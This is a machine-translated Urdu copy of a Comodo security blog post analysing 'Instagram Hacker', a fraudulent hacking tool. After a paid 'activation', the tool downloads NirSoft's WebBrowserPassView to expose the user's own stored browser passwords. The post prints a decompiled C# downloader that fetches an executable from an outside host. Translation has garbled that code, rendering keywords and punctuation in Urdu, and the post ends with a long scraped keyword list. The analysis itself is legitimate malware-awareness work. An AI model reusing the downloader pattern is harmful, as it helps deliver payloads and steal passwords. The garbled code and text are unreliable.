پڑھنا وقت: 4 منٹ
بہت سے لوگ ممکنہ طور پر ناپسندیدہ ایپلی کیشنز (PUA) کو سنگین خطرے کے طور پر نہیں لیتے ہیں۔ اس طرح کے لاپرواہ رویہ کی وجہ یہ ہے کہ PUA عام طور پر صارف کی رضامندی سے نصب کیے جاتے ہیں۔ لیکن یہ رائے ایک بہت بڑی غلطی ہے۔ اور نہ صرف اس لیے کہ PUA خفیہ طور پر دوسرے پروگرام جیسے ایڈویئر یا اسپائی ویئر کو ڈرائیو کے ذریعے ڈاؤن لوڈ کی بنیاد پر انسٹال کر سکتا ہے۔ روشن مثال ذیل میں کوموڈو تھریٹ ریسرچ لیبز کے ذریعہ تجزیہ کیا گیا ہے۔ ماہرین واضح طور پر ظاہر کرتے ہیں کہ PUA ایک بہت زیادہ خطرناک ہتھیار ہو سکتا ہے۔
"انسٹاگرام ہیکر" نامی سافٹ ویئر سے ملیں۔ اس کی سرکاری ویب سائٹ ہے۔ https://hackinstagram.net/ اور کسی بھی انسٹاگرام اکاؤنٹ کو ہیک کرنے کا وعدہ کرتا ہے۔ اس کے علاوہ، آپ اسے مفت میں ڈاؤن لوڈ اور انسٹال کر سکتے ہیں۔
انسٹالیشن کے بعد، یہ انسٹاگرام پروفائل یو آر ایل درج کرنے اور پاس ورڈ کو ہیک کرنے کا اشارہ کرتا ہے۔
نتیجہ چند سیکنڈ میں آتا ہے:
لیکن "پاس ورڈ دیکھیں" کے بٹن پر کلک کرنے کے بعد، ایک نئی ونڈو ظاہر ہوتی ہے:
"ایکٹیویشن کوڈ حاصل کریں" بٹن پر کلک کرنے سے "صفحہ خریدیں" پر ری ڈائریکٹ ہو جاتا ہے۔
یہ "ایکٹیویشن کوڈ" خریدنے کی پیشکش کرتا ہے لیکن … کیا آپ کو ہوا میں دھوکہ دہی کی بو آ سکتی ہے؟ یہ واضح ہے کہ کوئی بھی ایسا سافٹ ویئر موجود نہیں ہے جو سیکنڈوں کے لیے انسٹاگرام پاس ورڈ کو توڑنے کے قابل ہو۔ تو کیا انسٹاگرام ہیکر سادہ لوحوں کو دھوکہ دینے کے لیے صرف ایک اور دھوکہ دینے والا ٹول ہے؟ اسے چیک کرنے کا بہترین طریقہ ایپلیکیشن کوڈ کے اندر دیکھنا ہے۔
کوڈ Dotnet Reactor کے ساتھ محفوظ ہے لیکن de4dot ٹول سے ڈی کوڈ کیا جا سکتا ہے۔
اور اب ہم یقینی طور پر دیکھ سکتے ہیں کہ درخواست دھوکہ دہی کا ایک آلہ ہے۔ کوڈ کا پہلا ٹکڑا صرف ترقی کے مظاہرے کے اشارے کو جعلی بناتا ہے۔
لیکن ایک اور زیادہ دلچسپ ہے۔ جیسا کہ آپ دیکھ سکتے ہیں، اس میں ایک یو آر ایل موجود ہے جس میں ایکٹیویشن کامیاب ہونے کی صورت میں ڈاؤن لوڈ کرنے کے قابل ہے۔
لوڈنگ ونڈو()
{
Class2.qDiUy7EzyuIMj();
this.filename = "view.exe"؛
this.uri = new Uri("http://software-logistics.net/external/component/download/view.exe")؛
this.InitializeComponent();
اگر (File.Exists(this.filename))
{
File.Delete(this.filename);
}
کوشش
{
WebClient client1 = نیا WebClient()؛
client1.DownloadFileAsync(this.uri, this.filename);
client1.DownloadProgressChanged += new DownloadProgressChangedEventHandler(this.method_1)؛
client1.DownloadFileCompleted += new AsyncCompletedEventHandler(this.method_2)؛
}
کیچ
{
this.method_0();
}
}
}
}
اگر ہم ایگزیکیوٹیبل چلاتے ہیں، تو ہمیں پتہ چل جائے گا کہ یہ NirSoft کی WebBrowserPassView ایپلی کیشن ہے:
https://www.nirsoft.net/utils/web_browser_password.html
WebBrowserPassView صرف ایک پاس ورڈ نکالنے کا ٹول ہے جو ویب براؤزرز کے پاس ورڈز کو ظاہر کرتا ہے۔ لہذا یہ سافٹ ویئر جو بھی پاس ورڈ نکال سکتا ہے وہ انسٹاگرام کے نہیں ہیں بلکہ صارفین کے اپنے پاس ورڈز اپنے براؤزر میں رکھے ہوئے ہیں!
آئیے دوبارہ شروع کریں: Instagram ہیکر جو کچھ کرتا ہے وہ ہے NirSoft سے ایک اور PUA ڈاؤن لوڈ اور لانچ کرنا۔ لہذا ہمیں واضح طور پر دھوکہ دہی کے آلے کا سامنا کرنا پڑتا ہے۔ جوڑ توڑ کی نفسیاتی چال کو یہاں دیکھیں: اگر کسی متاثرہ کو پتہ چلتا ہے کہ اسے دھوکہ دیا گیا ہے، تو وہ پولیس کو اس واقعے کی اطلاع بمشکل ہی بتاتی ہے۔ کیونکہ اس صورت میں، اسے انسٹاگرام کو ہیک کرنے کی کوشش میں اعتراف کرنا پڑے گا، یہ سائبر کرائم کا ارتکاب ہے۔
لیکن یہ کنارے کا ایک پتلا اختتام ہے۔
سب سے خطرناک خطرہ یہ ہے کہ ایپلی کیشن میں موجود یو آر ایل کو کسی بھی دوسرے پر کسی نقصان دہ فائل کے ساتھ آسانی سے تبدیل کیا جا سکتا ہے جو کہ متاثرہ کی مشین پر چلائی جائے گی۔ لہذا یہ PUA - نیز اس طرح کے میلویئر کی بہت سی دوسری مثالیں - مختلف "بھاری" مالویئر جیسے ٹروجن، بیک ڈور، کے بڑے پیمانے پر پھیلاؤ کے لیے استعمال کی جا سکتی ہیں۔ ransomware کے وغیرہ شامل ہیں.
اور یہ PUA کو واقعی خطرناک میلویئر کے طور پر لینے کی ایک اچھی وجہ ہے۔ کیونکہ یہ تباہ کن بڑے پیمانے پر سائبر اٹیک کے لیے اسپرنگ بورڈ ثابت ہو سکتا ہے۔
"آج ہمیں غور نہیں کرنا چاہئے۔ میلویئر کموڈو تھریٹ ریسرچ لیبز کے سربراہ، فتح اورحان کہتے ہیں، جتنا خطرناک یا اتنا خطرناک نہیں۔ ”کوئی بھی میلویئر الگ تھلگ جگہ میں موجود نہیں ہے۔ آج کل سائبر کرائمینز صارفین پر حملہ کرنے کے لیے لمبی میلویئر چینز بناتے ہیں، اور جیسا کہ آپ دیکھ سکتے ہیں، PUA اس طرح کے قتل کے سلسلے میں ایک کڑی ہو سکتی ہے۔ لہذا ہمیں کودال کو کودال کہنا چاہئے۔ جی ہاں، یہ ایپلیکیشنز ڈاؤن لوڈ کی جاتی ہیں اور صارفین کی منظوری سے چلائی جاتی ہیں لیکن، جیسا کہ اس معاملے میں، منظوری دھوکہ دہی سے چھین لی جاتی ہے۔ ممکنہ طور پر ناپسندیدہ ایپلی کیشنز کے دوران جائز ہونے کا بہانہ کرتے ہیں، ہر کسی کو یہ سمجھنے کی ضرورت ہے کہ یہ صرف ایک چھلاورن ہے۔ یہی وجہ ہے کہ کوموڈو نہ صرف اعلیٰ درجے کا تکنیکی تحفظ فراہم کرتا ہے بلکہ صارفین کو سائبر اسپیس میں خطرناک جال سے بچنے کے لیے باقاعدگی سے مطلع کرتا ہے۔
کوموڈو کے ساتھ محفوظ رہیں!
متعلقہ وسائل
ویکیپیڈیا ڈی ڈی او ایس اٹیک
میلویئر کو ہٹانا
ویب سائٹ میلویئر سکینر
بہترین ویب سائٹ سیکیورٹی
ورڈپریس سیکورٹی
مفت آزمائش شروع کریں اپنا فوری سیکیورٹی سکور کارڈ مفت حاصل کریں۔
- SEO سے چلنے والا مواد اور PR کی تقسیم۔ آج ہی بڑھا دیں۔
- پلیٹو بلاک چین۔ Web3 Metaverse Intelligence. علم میں اضافہ۔ یہاں تک رسائی حاصل کریں۔
- ماخذ: https://blog.comodo.com/comodo-news/how-unwanted-applications-are-greater-security-threat/
- a
- قابلیت
- ہمارے بارے میں
- اکاؤنٹ
- ایکٹ
- چالو کرنے کی
- کے بعد
- AIR
- تمام
- اور
- ایک اور
- درخواست
- ایپلی کیشنز
- منظوری
- حملہ
- رویہ
- گھر کے دروازے
- بنیاد
- کیونکہ
- BEST
- بگ
- بلاگ
- توڑ
- براؤزر
- تعمیر
- بٹن
- خرید
- فون
- کیس
- چین
- زنجیروں
- چیک کریں
- واضح طور پر
- کوڈ
- کام کرنا
- رضامندی
- غور کریں
- پر مشتمل ہے
- سائبر حملہ
- سائبر جرائم
- cybercriminals
- خطرے
- خطرناک
- DDoS
- تباہ کن
- پتہ چلتا ہے
- نہیں
- دوگنا
- ڈاؤن لوڈ، اتارنا
- آسانی سے
- ایج
- درج
- وغیرہ
- واقعہ
- مثال کے طور پر
- مثال کے طور پر
- ماہرین
- نکالنے
- چہرہ
- چند
- فائل
- مل
- پہلا
- دھوکہ دہی
- مفت
- سے
- حاصل
- اچھا
- زیادہ سے زیادہ
- ہیک
- ہیکر
- سر
- یہاں
- کس طرح
- کیسے
- HTML
- HTTPS
- in
- واقعہ
- اشارے
- انسٹال
- فوری
- دلچسپ
- الگ الگ
- IT
- لیبز
- شروع
- LINK
- لانگ
- دیکھو
- مشین
- میلویئر
- میلویئر حملہ
- بہت سے
- بڑے پیمانے پر
- زیادہ سے زیادہ چوڑائی
- غلطی
- زیادہ
- سب سے زیادہ
- نامزد
- ضروریات
- نئی
- واضح
- تجویز
- سرکاری
- سرکاری ویب سائٹ
- ایک
- رائے
- دیگر
- خود
- پاس ورڈ
- پاس ورڈز
- لوگ
- پی ایچ پی
- پلاٹا
- افلاطون ڈیٹا انٹیلی جنس
- پلیٹو ڈیٹا
- پولیس
- ممکنہ طور پر
- کی روک تھام
- پروفائل
- پروگرام
- پیش رفت
- وعدہ کیا ہے
- محفوظ
- تحفظ
- فراہم
- احساس
- وجہ
- بے باک
- باقاعدگی سے
- رپورٹیں
- تحقیق
- نتیجہ
- تجربے کی فہرست
- پتہ چلتا
- چھٹکارا
- رن
- سکور کارڈ
- سیکنڈ
- محفوظ بنانے
- سیکورٹی
- سنگین
- ہونا چاہئے
- So
- سافٹ ویئر کی
- خلا
- سپائیویئر
- ذخیرہ
- کامیاب
- اس طرح
- لے لو
- ٹیکنیکل
- ۔
- ان
- خطرہ
- بھر میں
- وقت
- کرنے کے لئے
- کے آلے
- نیٹ ورک
- ٹرن
- سمجھ
- ناپسندیدہ
- URL
- رکن کا
- صارفین
- عام طور پر
- مختلف
- وکٹم
- لنک
- ویب
- ویب براؤزر
- ویب سائٹ
- گے
- گا
- تم
- اور
- زیفیرنیٹ